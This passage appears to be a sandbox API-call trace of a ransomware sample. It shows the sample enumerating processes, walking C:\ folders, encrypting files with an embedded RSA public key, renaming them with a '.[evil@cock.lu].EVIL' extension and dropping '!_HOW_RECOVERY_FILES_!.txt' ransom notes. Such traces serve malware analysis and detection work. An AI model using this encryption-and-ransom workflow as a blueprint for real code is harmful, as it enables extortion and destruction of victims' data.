cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.935] CloseHandle (hObject=0x17c) returned 1 [0075.935] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0075.943] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.012] CloseHandle (hObject=0x198) returned 1 [0076.012] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0076.020] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.135] CloseHandle (hObject=0x17c) returned 1 [0076.135] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0076.143] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.311] CloseHandle (hObject=0x198) returned 1 [0076.311] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0076.336] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.470] CloseHandle (hObject=0x17c) returned 1 [0076.470] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0076.480] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.559] CloseHandle (hObject=0x198) returned 1 [0076.560] GetLogicalDrives () returned 0x4 [0076.560] wcslen (_String=":\\") returned 0x2 [0076.560] wcslen (_String="C:\\Program Files (x86)\\Microsoft SQL Server\\") returned 0x2c [0076.560] wcscpy_s (in: _Destination=0x84b0fdf5f0, _SizeInWords=0x104, _Source="C:\\Program Files (x86)\\Microsoft SQL Server\\" | out: _Destination="C:\\Program Files (x86)\\Microsoft SQL Server\\") returned 0x0 [0076.560] wcscat (in: _Dest=0x84b0fdf5f0, _Source="\\*" | out: _Dest="C:\\Program Files (x86)\\Microsoft SQL Server\\\\*") returned="C:\\Program Files (x86)\\Microsoft SQL Server\\\\*" [0076.560] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft SQL Server\\\\*", lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 0xffffffffffffffff [0076.560] wcslen (_String="C:\\Program Files\\Microsoft SQL Server\\") returned 0x26 [0076.560] wcscpy_s (in: _Destination=0x84b0fdf5f0, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft SQL Server\\" | out: _Destination="C:\\Program Files\\Microsoft SQL Server\\") returned 0x0 [0076.560] wcscat (in: _Dest=0x84b0fdf5f0, _Source="\\*" | out: _Dest="C:\\Program Files\\Microsoft SQL Server\\\\*") returned="C:\\Program Files\\Microsoft SQL Server\\\\*" [0076.561] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server\\\\*", lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 0xffffffffffffffff [0076.561] wcslen (_String="C:\\") returned 0x3 [0076.561] wcscpy_s (in: _Destination=0x84b0fdf5f0, _SizeInWords=0x104, _Source="C:\\" | out: _Destination="C:\\") returned 0x0 [0076.561] wcscat (in: _Dest=0x84b0fdf5f0, _Source="\\*" | out: _Dest="C:\\\\*") returned="C:\\\\*" [0076.561] FindFirstFileW (in: lpFileName="C:\\\\*", lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 0x84b11cd630 [0076.561] wcsstr (_Str="$Recycle.Bin", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.561] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin") returned 16 [0076.561] wcscmp (_String1=".", _String2="$Recycle.Bin") returned 1 [0076.561] wcscmp (_String1="..", _String2="$Recycle.Bin") returned 1 [0076.561] wcslen (_String="C:\\\\$Recycle.Bin") returned 0x10 [0076.561] wcscpy_s (in: _Destination=0x84b0fdf0d0, _SizeInWords=0x104, _Source="C:\\\\$Recycle.Bin" | out: _Destination="C:\\\\$Recycle.Bin") returned 0x0 [0076.561] wcscat (in: _Dest=0x84b0fdf0d0, _Source="\\*" | out: _Dest="C:\\\\$Recycle.Bin\\*") returned="C:\\\\$Recycle.Bin\\*" [0076.561] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\*", lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0x84b11cd0f0 [0076.562] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.562] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\.") returned 18 [0076.562] wcscmp (_String1=".", _String2=".") returned 0 [0076.562] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0076.562] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.562] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\..") returned 19 [0076.562] wcscmp (_String1=".", _String2="..") returned -1 [0076.562] wcscmp (_String1="..", _String2="..") returned 0 [0076.562] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0076.562] wcsstr (_Str="S-1-5-18", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.562] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-18") returned 25 [0076.562] wcscmp (_String1=".", _String2="S-1-5-18") returned -1 [0076.562] wcscmp (_String1="..", _String2="S-1-5-18") returned -1 [0076.562] wcslen (_String="C:\\\\$Recycle.Bin\\S-1-5-18") returned 0x19 [0076.562] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\$Recycle.Bin\\S-1-5-18" | out: _Destination="C:\\\\$Recycle.Bin\\S-1-5-18") returned 0x0 [0076.562] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-18\\*") returned="C:\\\\$Recycle.Bin\\S-1-5-18\\*" [0076.562] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0076.581] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.581] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-18\\.") returned 27 [0076.581] wcscmp (_String1=".", _String2=".") returned 0 [0076.581] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0076.581] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.581] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-18\\..") returned 28 [0076.581] wcscmp (_String1=".", _String2="..") returned -1 [0076.581] wcscmp (_String1="..", _String2="..") returned 0 [0076.581] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0076.581] wcsstr (_Str="desktop.ini", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0076.581] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0076.582] wcscmp (_String1="desktop.ini", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0076.582] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="desktop.ini") returned 0x0 [0076.582] wcslen (_String="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 0x25 [0076.582] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0076.908] ReadFile (in: hFile=0x19c, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde700*=0x81, lpOverlapped=0x0) returned 1 [0076.915] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0076.915] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0076.915] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0076.915] _errno () returned 0x84b1160840 [0076.915] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.915] WriteFile (in: hFile=0x19c, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde700*=0xa0, lpOverlapped=0x0) returned 1 [0076.916] CloseHandle (hObject=0x19c) returned 1 [0076.917] strlen (_Str="-----BEGIN PUBLIC KEY-----\nMIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBdwBDnuqdqx5dw5x6U0VTz\nvG4LVR3L0wqPV8lwZi4WiLEbqXk36ns39i1l5SI43q6Adcw0O/PYvp8qOVp+vqXd\nEOhmdZjKIjoxHGtCxWYJFfXp/K2gK/zXupoJ/kktKna2C0FV+oLADOodTNCLGWIE\n8QeSCJuUuEtBCp6O5wKB4y6FuohbmnRna7IN7u8o9YZFT8QU4WOL+WUji+lhdJN6\nDcy/MDQTSchNiHYFERsx74lcOX7txs1JBMtQTuYxeFTowsQNiqK6GnJN3UkIk0X9\nFeruRiCRzNfUZ+yhCakK67DdbOLaslzN9jYl+cIwMK4fqM5FBzzEqGYieg+Gfpd5\nAgMBAAE=\n-----END PUBLIC KEY-----") returned 0x1c2 [0076.917] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBdwBDnuqdqx5dw5x6U0VTz\nvG4LVR3L0wqPV8lwZi4WiLEbqXk36ns39i1l5SI43q6Adcw0O/PYvp8qOVp+vqXd\nEOhmdZjKIjoxHGtCxWYJFfXp/K2gK/zXupoJ/kktKna2C0FV+oLADOodTNCLGWIE\n8QeSCJuUuEtBCp6O5wKB4y6FuohbmnRna7IN7u8o9YZFT8QU4WOL+WUji+lhdJN6\nDcy/MDQTSchNiHYFERsx74lcOX7txs1JBMtQTuYxeFTowsQNiqK6GnJN3UkIk0X9\nFeruRiCRzNfUZ+yhCakK67DdbOLaslzN9jYl+cIwMK4fqM5FBzzEqGYieg+Gfpd5\nAgMBAAE=\n-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x84b0fdddf0, pcbBinary=0x84b0fdd5c4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x84b0fdddf0, pcbBinary=0x84b0fdd5c4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0076.917] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x84b0fdddf0, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x84b0fdd5e8, pcbStructInfo=0x84b0fdd5e0 | out: pvStructInfo=0x84b0fdd5e8, pcbStructInfo=0x84b0fdd5e0) returned 1 [0076.918] CryptAcquireContextW (in: phProv=0x84b0fdd5d8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x84b0fdd5d8*=0x84b11ce640) returned 1 [0076.919] CryptImportPublicKeyInfo (in: hCryptProv=0x84b11ce640, dwCertEncodingType=0x1, pInfo=0x84b11cc920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x84b11cc968*, PublicKey.cbData=0x10d, PublicKey.pbData=0x84b11cc970*, PublicKey.cUnusedBits=0x0), phKey=0x84b0fdd5d0 | out: phKey=0x84b0fdd5d0*=0x84b11cc6c0) returned 1 [0076.920] CryptEncrypt (in: hKey=0x84b11cc6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x84b0fdd5c0*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x84b0fdd5c0*=0x100) returned 1 [0076.920] CryptEncrypt (in: hKey=0x84b11cc6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x84b116acc0*, pdwDataLen=0x84b0fdd5c8*=0x20, dwBufLen=0x100 | out: pbData=0x84b116acc0*, pdwDataLen=0x84b0fdd5c8*=0x100) returned 1 [0076.921] setlocale (category=0, locale=0x0) returned="C" [0076.921] setlocale (category=0, locale="C") returned="C" [0076.921] ___lc_codepage_func () returned 0x0 [0076.921] calloc (_Count=0x100, _Size=0x2) returned 0x84b116b4e0 [0076.921] __pctype_func () returned 0x7ffc020d8e50 [0076.921] ___lc_handle_func () returned 0x84b116b37c [0076.921] setlocale (category=0, locale="C") returned="C" [0076.921] _wfsopen (_FileName="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0076.922] setlocale (category=0, locale=0x0) returned="C" [0076.922] setlocale (category=0, locale="C") returned="C" [0076.922] setlocale (category=0, locale="C") returned="C" [0076.922] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0076.922] __uncaught_exception () returned 0x84b1160800 [0076.922] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0076.923] MoveFileW (lpExistingFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), lpNewFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini.[evil@cock.lu].EVIL" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.[evil@cock.lu].evil")) returned 1 [0077.077] ??_V@YAXPEAX@Z () returned 0x1 [0077.080] SetFileAttributesW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\desktop.ini", dwFileAttributes=0x0) returned 0 [0077.080] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.080] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.080] wcslen (_String="C:\\\\$Recycle.Bin\\S-1-5-18") returned 0x19 [0077.080] strlen (_Str="${KEY}") returned 0x6 [0077.080] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x391) returned 0x84b116b8d0 [0077.081] memchr (_Buf=0x84b116b8d1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.081] strlen (_Str="${CODE}") returned 0x7 [0077.081] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x390) returned 0x84b116b8d0 [0077.081] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.081] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.081] _wfsopen (_FileName="C:\\\\$Recycle.Bin\\S-1-5-18\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.082] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.082] __uncaught_exception () returned 0x84b1160800 [0077.082] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.083] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.083] wcsstr (_Str="S-1-5-21-1462094071-1423818996-289466292-1000", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.083] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000") returned 62 [0077.083] wcscmp (_String1=".", _String2="S-1-5-21-1462094071-1423818996-289466292-1000") returned -1 [0077.083] wcscmp (_String1="..", _String2="S-1-5-21-1462094071-1423818996-289466292-1000") returned -1 [0077.083] wcslen (_String="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000") returned 0x3e [0077.084] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000" | out: _Destination="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000") returned 0x0 [0077.084] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0077.084] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.084] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.084] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\.") returned 64 [0077.084] wcscmp (_String1=".", _String2=".") returned 0 [0077.084] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.084] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.084] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\..") returned 65 [0077.084] wcscmp (_String1=".", _String2="..") returned -1 [0077.084] wcscmp (_String1="..", _String2="..") returned 0 [0077.085] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.085] wcsstr (_Str="desktop.ini", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.085] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 74 [0077.085] wcscmp (_String1="desktop.ini", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.085] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="desktop.ini") returned 0x0 [0077.085] wcslen (_String="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 0x4a [0077.085] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0077.087] ReadFile (in: hFile=0x19c, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde700*=0x81, lpOverlapped=0x0) returned 1 [0077.095] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0077.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0077.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0077.095] _errno () returned 0x84b1160840 [0077.096] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.096] WriteFile (in: hFile=0x19c, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde700*=0xa0, lpOverlapped=0x0) returned 1 [0077.096] CloseHandle (hObject=0x19c) returned 1 [0077.097] _wfsopen (_FileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.097] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0077.097] __uncaught_exception () returned 0x84b1160800 [0077.097] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.098] MoveFileW (lpExistingFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini"), lpNewFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini.[evil@cock.lu].EVIL" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini.[evil@cock.lu].evil")) returned 1 [0077.231] ??_V@YAXPEAX@Z () returned 0x1 [0077.234] SetFileAttributesW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini", dwFileAttributes=0x0) returned 0 [0077.234] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.234] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.234] wcslen (_String="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000") returned 0x3e [0077.234] strlen (_Str="${KEY}") returned 0x6 [0077.234] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x391) returned 0x84b116b8d0 [0077.234] memchr (_Buf=0x84b116b8d1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.234] strlen (_Str="${CODE}") returned 0x7 [0077.234] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x390) returned 0x84b116b8d0 [0077.235] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.235] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.235] _wfsopen (_FileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.237] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.237] __uncaught_exception () returned 0x84b1160800 [0077.237] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.238] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0 [0077.238] FindClose (in: hFindFile=0x84b11cd0f0 | out: hFindFile=0x84b11cd0f0) returned 1 [0077.238] wcslen (_String="C:\\\\$Recycle.Bin") returned 0x10 [0077.238] strlen (_Str="${KEY}") returned 0x6 [0077.238] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x391) returned 0x84b116b8d0 [0077.238] memchr (_Buf=0x84b116b8d1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.238] strlen (_Str="${CODE}") returned 0x7 [0077.238] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x390) returned 0x84b116b8d0 [0077.239] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.239] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.239] _wfsopen (_FileName="C:\\\\$Recycle.Bin\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.239] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.239] __uncaught_exception () returned 0x84b1160800 [0077.239] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.240] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0077.240] wcsstr (_Str="Boot", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.240] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot") returned 8 [0077.240] wcscmp (_String1=".", _String2="Boot") returned -1 [0077.240] wcscmp (_String1="..", _String2="Boot") returned -1 [0077.240] wcslen (_String="C:\\\\Boot") returned 0x8 [0077.240] wcscpy_s (in: _Destination=0x84b0fdf0d0, _SizeInWords=0x104, _Source="C:\\\\Boot" | out: _Destination="C:\\\\Boot") returned 0x0 [0077.241] wcscat (in: _Dest=0x84b0fdf0d0, _Source="\\*" | out: _Dest="C:\\\\Boot\\*") returned="C:\\\\Boot\\*" [0077.241] FindFirstFileW (in: lpFileName="C:\\\\Boot\\*", lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0x84b11cd0f0 [0077.241] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.241] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\.") returned 10 [0077.241] wcscmp (_String1=".", _String2=".") returned 0 [0077.241] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.261] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.261] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\..") returned 11 [0077.261] wcscmp (_String1=".", _String2="..") returned -1 [0077.261] wcscmp (_String1="..", _String2="..") returned 0 [0077.261] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.261] wcsstr (_Str="BCD", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.261] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\BCD") returned 12 [0077.261] wcscmp (_String1="BCD", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.262] wcsstr 